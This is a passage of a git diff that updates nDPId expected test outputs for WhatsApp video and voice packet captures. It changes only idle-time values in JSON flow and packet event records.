DJ7J2GkLvQbStohFZjKPShMILgTsEvkwNRe5icjnZF5b4X\/JteDZslY73Nte1q4DiPugbpWEOEW3UaXBVcccSnBXfsrY1lsgjH8BpxoTBACfj\/Nm3cIxvIq14OKHRvxy9b0mNen\/kzoDrO5sZ\/dAjHBdNu5W\/9k529dGB7vwkors="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455769789,"flow_last_seen":1561455769789,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455769789,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.48","src_port":53688,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00608{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1561455769789,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1561455769789,"pkt":"xiwDYGpkkLkxKPrKCABFAACaxMYAAEARfZvAqAIMHw1WMNG4DZYAhm0oAAMAaiESpEIMCJFuDJOtHXjqlExAAABmBQMCyDZF2ddgtlA0UBZWUTgM5bMiF47oTfkR8gxwf\/X6xPiwJonhfyRnCC\/1O3gjqwa36NKC7reorVrW4TGrS5w3rc3nItJV\/XceDJIdYAVMp2RD9UKe1LYtRXT0bfL9vCinKf9\/"} 00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455769789,"flow_last_seen":1561455769789,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455769789,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.48","src_port":53688,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} @@ -35,8 +35,8 @@ 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":44,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455770313,"flow_last_seen":1561455770313,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1561455770313,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":51277,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00625{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1561455770313,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1561455770313,"pkt":"AQBef\/\/6kLkxKPrKCABFAAClcA8AAAIRlYrAqAIM7\/\/\/+shNB2wAkeqFTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} 00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455770313,"flow_last_seen":1561455770313,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1561455770313,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":51277,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":51,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1561455767339,"flow_last_seen":1561455770332,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6901,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1561455770332,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.53","src_port":49355,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":51,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1561455767339,"flow_last_seen":1561455770332,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6901,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1561455770332,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.53","src_port":49355,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":51,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1561455767339,"flow_last_seen":1561455770332,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6901,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1561455770332,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.53","src_port":49355,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":51,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1561455767339,"flow_last_seen":1561455770332,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6901,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1561455770332,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.53","src_port":49355,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":144,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455772049,"flow_last_seen":1561455772049,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1561455772049,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00852{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":144,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1561455772049,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1561455772049,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFInqwAAP8RG\/kAAAAA\/\/\/\/\/wBEAEMBNNtQAQEGAH5K8tcAMwAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwoBeQMGD3f8XywuOQIF3D0HAdgwYlYAHDMEAHanAAwKTHVjYXMtaU1hY\/8AAAAAAAAAAAAAAAAA"} 00734{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":144,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455772049,"flow_last_seen":1561455772049,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1561455772049,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"lucas-imac","fingerprint":"1,121,3,6,15,119,252,95,44,46","class_ident":""}} @@ -77,7 +77,7 @@ 00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":493,"flow_first_seen":1561455769789,"flow_last_seen":1561455792270,"flow_idle_time":180000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":1139,"flow_tot_l4_payload_len":227969,"flow_avg_l4_payload_len":462,"midstream":0,"thread_ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.48","src_port":53688,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1561455792270,"flow_last_seen":1561455795277,"flow_idle_time":180000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":65025,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00841{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":893,"flow_first_seen":1561455781352,"flow_last_seen":1561455792065,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":1293,"flow_tot_l4_payload_len":647331,"flow_avg_l4_payload_len":724,"midstream":0,"thread_ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"91.252.56.51","src_port":53688,"dst_port":32641,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":133,"flow_first_seen":1561455767339,"flow_last_seen":1561455795283,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":11742,"flow_avg_l4_payload_len":88,"midstream":1,"thread_ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.53","src_port":49355,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":133,"flow_first_seen":1561455767339,"flow_last_seen":1561455795283,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":11742,"flow_avg_l4_payload_len":88,"midstream":1,"thread_ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.53","src_port":49355,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1561455781247,"flow_last_seen":1561455791996,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":792,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"1.60.78.64","src_port":53688,"dst_port":59491,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00565{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","packets-captured":1567,"packets-processed":1567,"total-skipped-flows":0,"total-l4-data-len":891931,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":14,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":14,"total-idle-flows":14,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":82,"global_ts_msec":1561455795283} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ diff --git a/test/results/wa_voice.pcap.out b/test/results/wa_voice.pcap.out index 595d40fa5..9ac483da2 100644 --- a/test/results/wa_voice.pcap.out +++ b/test/results/wa_voice.pcap.out @@ -10,39 +10,39 @@ 00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455687991,"flow_last_seen":1561455687991,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1561455687991,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":60765,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"},"dns": {"query":"g.whatsapp.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00530{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1561455688018,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":113,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":113,"pkt_l4_len":79,"thread_ts_msec":1561455688018,"pkt":"kLkxKPrKxiwDYGpkCABFAABj38gAAEARFWTAqAIBwKgCDAA17V0ATz5mDHeBgAABAAIAAAAAAWcId2hhdHNhcHADbmV0AAABAAHADAAFAAEAAArzAAsEY2hhdANjZG7ADsAsAAEAAQAAAEEABJ3wFDU="} 00785{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1561455687991,"flow_last_seen":1561455688018,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":71,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1561455688018,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":60765,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"},"dns": {"query":"g.whatsapp.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"157.240.20.53"}} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455688201,"flow_last_seen":1561455688201,"flow_idle_time":7440000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1561455688201,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"17.242.60.84","src_port":49354,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -02420{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1561455688201,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1561455688201,"pkt":"xiwDYGpkkLkxKPrKCABFAgXUAABAAEAGJCjAqAIMEfI8VMDKFGdIDyQZ7pIeMIAQCAC0bwAAAQEICjTN8KY8skLCFwMDD+Ai5NOSopi\/6GqwlD\/tAZzY1QGzvljqTGTmGCJOrU3x8CYKomrYaziO5eZ4ouY8cCYpOJvKrDNJX33pdge2bBxjgZp3ciHlbT9gHcPpJV3HIK5K4Xwsy7N\/d9l3pDdGz5PHrVVzZeXakf14DKR+hXrIhRVy6hpv5t2VthQzM3sKU7KhJpL\/6a5Sp489WK3Z7dzYFK2J+ermhE1b03GDPIEb7MGTpTJQaqangZgy8gro1eaetAilk1o529zodA1M9O5BVqL2oF301LG+kaqQTY1SPLvOnn1MxBlBEbzmsfvPr0H7C5Xcv51kP+cMU9R39VU1KEVp3e+2GMmIXWxgb+NKRMo4d5o6BKoHJ36YKQ33eAmIMAcZsFkdzfDz5q2jCxngiuQsbQKoYL1rQHGV7CXWI3zE9edQrQPJaGQZaxu\/+b+1vqSWxtCMEOUMVSmhM+FpUOqnKqwXsN4BgvySE1+U34RH0SV6FPoBjF0WGfVjkUid\/lVZcbedi\/PfkG0yBpT2\/Is9EIUqT+5Azj96UOFZqIEtSsIYSrk7ySkvjrKz5bHkeMLQk1mxQwJByZOSa30oY5bmNGAgD00g7CKAigVgWl6pq33BURhk4PDRhLJn426pN8ndnOOPzVylhr5g1C978hT8qaiuW1hlXdPnoMeCp9hEy7A5ziIjQi\/j6SVmDBSjwtJ0oqoQ\/ul2VzP1hHUGnZiTl\/qoxKKUfFrrwqTto6BvQjrKNa8bmHfrJg1RkCF3YK1iU3RCTPB\/4c68wZU3wRZ8hH1dNOLSgkwNQHFvEa\/gv\/qOxZkCS+Hpja9b5OtYooCqZnURTItdIoosw\/pte6KHG8eCIx\/U7yLLCmLs4D6MQwGZZ2yJ9zt9zcZXv1g03W4UohfquGy0ioHzSnw\/O3jNSfyTyrsrgxGqBD7B02ehphvU7Ax3IIziLDpWGnOBTyjYVNl423Z+0c9qK5fdUeybRNKKbWmwJqAFyKo3Mn2oSjBse+IbmEyy74UtCrn7MO79P00k7ZwAdz4X9zs28aMTKpnGFfXXxKMpT0Dd5ofiYXaTFr2Jwybi92XLCleA2OWxMIUro0rxoo67fYKdVxbqwQCMyEw6LTznHMXWYOpkkn6VHuawZe8M1HJsON5lEoItuqd\/IBfWUMshGlV8OgIAoc3EW3VlOFAiqg0pqVqjmyE8T8wQAvejRCf2f7iThtrzSrjIJDgibkW3Ecp3KoIC1KVlhjp4HLMvTgc12F13bDzcsr4rYSNpgOus\/4N4UzMrQyfYM2uNlqx0HfPLs50MVn\/Kyef0KdSuCHGqHLEJ+g1+EB9i2mop53wwymGotu9IoWgU02wrdRtoavOIQ5TMaPT9Jy+tmpyw9rSZn4YhMfxR72sCFIVM2eQlDOP2kti8y02qh8vwstuWp8ER3\/PKo9BgChhkuUmF5Df6lKXn1exWi67C9f1S5pc1iv33gDt3T0VcEHwoxmIh6MLrQ4LDUY7JX7mEuRfro3sR\/Ir2ufPPOhOBqsPV5YskVY9tWAevz7WMRn8EtRyvVaVHL3wxu1gErJNgcQ\/Af9fGR5KHI8lfrzLWY+bV9Q6PY8piE9FU2r7QV9Q5YgbBE6yKjPA3fOpiBOv+IVCsLXJNVdRvAywibpuoJAy2z01Fc5o3x+ZW2eqdFSSyuDepi7EBv4YJnAtmqjCVimRnoZ68Pz\/ocEFw5tBKkvU5uadJKwflJJ0hJUUOKwAQFCWvvApj3f356wTvDmU788W1R\/Vmzin60ZrsL16uD4sDmXGOueQVWddIzbIT0jyuT6IK9gJjCyELuMZhwwjNJ\/gEh8+\/PwFaVXbn\/1dsvjpj0IhPwCusRttL60194v983ySgSQpQrf9f+n\/rJIRYwpsq4DBRu9SydD72zD93mD4idl3s3tsUHh6rp5k7Bf4L"} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455688201,"flow_last_seen":1561455688201,"flow_idle_time":7440000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1561455688201,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"17.242.60.84","src_port":49354,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}} -02419{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1561455688202,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1561455688202,"pkt":"xiwDYGpkkLkxKPrKCABFAgXUAABAAEAGJCjAqAIMEfI8VMDKFGdIDym57pIeMIAQCADYpQAAAQEICjTN8KY8skLCFtVfgrozcBhAJsfsFvLQO\/UNbKaPAKskPEHc2H7HNZvZ0KHfZ\/KP+B9OyPm0SdMSjavTXp1RBX4n8dtnNy7ldwySyG0XJJWeRoZiiRtgXrZdFFD0QAS3Pe1DBo\/FUctyy9XBKqwrw5v92Jj5UtBctOxUvfejQ1SPTAJ5IukXOUTVRhF+GJ6uJpn2Gyv2J\/hXj4mZyNeIliL2I7bOA3ury1GpGWko+MWMnPSKdWfc+5iZ8htj49VB2VDsL+uaCsidGqZX708pkKajJgAtzAX6+OwUhPXab61vOJn2ZVsE84On3Sc1Kl0WWtXgaA5Kty9ym4wLqQYEYP55F5oeJX4cTBOZRUcxhyM2DEPfiJE4aGH7aPKJO1JXXtoaeR6aRsid5OY044cRXoCwjbqa8kVLoyG\/1hSUaMwK17Rm6Nq+PbrF+ED8fmHgN\/1Dutcz+R4xma\/dfBoQDryBVCTEwOthrl7LLjRmNDBA\/nKPrgUx1pUPyir\/k\/cBNu5VmA9ROEDXJTcYsaqkjSroNougihkTVcfxMwA0V1eozYWnylZYZfyg3u53u+M+Do2uu\/vpHb6ZX\/5fq7AfMO72tRX4kcflTeOHJPV42uX70ZwC1O+A2X8wG0wRrb8uK6OFhHts3S52N3FVIqWr3CBOEKtXus3msBLphIaEqtw7dKWimDDeKkgZyeDybQGBbwSqGgwXI4sXoyN6QNVYT2T4i6kGXwJ8KRo8HtR5yB7rhqGJ7va7Tq2PlcpSnVIQRwao1mofCncrFLbOpoxslAuFLv8G+fW1GEiueEIhAplFAErT8lEbc6sY9uI88S0O6mDpNBlvCBLanRfw12SWljEVA4Wh2w31ojL9SCLJgyYKb3rrXT3V5i0AGJxXutmEyz9yTXUcoSU1YUo3WfmVLfx6RyxgbfoU7yfB7G33wI6gfsYIkzsYXlIla2ZkFjlWmYTCmfyEh6mVsXCVMnp1BhZdWj+7bWgfM4VrhMG0uNxDM0Z53kq9r7jYLXP1URavTKVNjY1WxQ1RAuRJtVPSgtQELf6AAzGAMW947SHl7bPC94gub8Kmqytrgl8ICRtP21Twca8YlwoKzIkJ0ROGsHSJ1IUBnknB2X57XNTUY80EyrwKOEYdXqBbK5\/uwztG9gvPjPu8PKqPu7OCXZj1ZBnnEX2PjjdGe8\/qo\/GKpAlJAuol7xe33zGz401h7+ux36y894Mbarjx1CDQxx9YqwY6Lr4EHSyCq\/xOaCM9Ig4AmEcFYjNP6niCHmI6fO24v\/GQB6WXdzSw2ClyCXHYbvr4Qqi+4qXoeh2xXDeKjcBBfLtEOni++s2q3gzhbAvkZLj\/NmeA2TXw0Z3iDbzj8\/Y4RPkg+eKwZkIo3UDfKsFnJdpryN60+cHgLr\/4b6yqkGde7QP698bVNcwUBDmhcPTGUF72BSrLQvrtwQZtWbAZrNkztpBLnQ0QkqUG4rCER6dvRqYMKv5dFfseMTa1Q1gUuqPbbz23yUKTRtop\/\/Lht4EEFlQYsfbz48ddhpIGiMg5mZbcRDG3SabEXgtzSNVHYYfQC6vW4pikjByoIlKAdhA6SR3Oh3PU52UQkf1H00x5\/\/1hV8lcpLckyN2LNUVFAYrwz5do38QxPssBrJ+3S6\/aEGPegc3B67mnX5V9KdAWJTKT9mA6BOcYDIvqCcaofS9sLdAjWNazl\/6YRqmsk\/JZn6nsHta+t4co6kKrh8ZoenAhtwbNaOVmExbItteeviDeqFUd2pkhp3kXIT8d6YMdXIloWHR8vT7oGOwNL5sNWFZXjAeqyXFLohZVoKLbw4szdHzrmDOl0IHwY6y6lYvTSYc6OyNhkaHXFSCKUjvAFZPuWmliraxAT7phw5quixNUJhdRcYng0LMN9J3KAyHFA8Ber5WNyIqMxWZ5wh4eVaY0B\/wQ"} -02080{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1561455688202,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1255,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1255,"pkt_l4_len":1221,"thread_ts_msec":1561455688202,"pkt":"xiwDYGpkkLkxKPrKCABFAgTZAABAAEAGJSPAqAIMEfI8VMDKFGdIDy9Z7pIeMIAYCACWYAAAAQEICjTN8KY8skLChD9+sl9zTIn+9oKwtdTi9Vdi\/cqtS9SsuLktLexhq+H6HSh0nUz\/pR7lGjfA8jUSbTLAiEYeFmvZtDgZTjhibXwhbTyW2ej1slX5wS0YUeKb381u+fexhn3xRkOOgFD2lHUCDNs6ZDxZ3MgjWXZ\/6y+5+G4Cr5MmO9LbbXgHM2tCoGf6bFpAilIbDNDjf72PZn2d6eJMciO25CCni3NwF1VQe25Bd9JCM8RNSipKwwpntSqY6SidwnIyNKgMjNfj+GMhuOpcSsAcRSjT\/L\/y6Nc7rkRDfvgoZpO7IrcZRsLerm0SSzH8usyI2xA+WCvEPlDoV\/87+olgpceCoKG1cf6TrD9aD7Lh7Yzi2mRYXX50kN9XYC9UhK+eEqcUiK0EA6ia38NkceSip2pBuv85\/091UH5OzSLrTUOJg+XVoE7ssGb7XKiRE+FOZu+zmhmuXn2Ujg8u76JsqT+uY0KkCyvwkXLeCV2kPGxz31MiSwGtNtz1oNvEGHur+FQDs\/zPpy1TfX803cqFKkblAu9BFTe4MXIK6IqhxFJcK3dj\/d8o2Zlvxu2S2NA3FH3zT7CWqacXhL+wQyS+\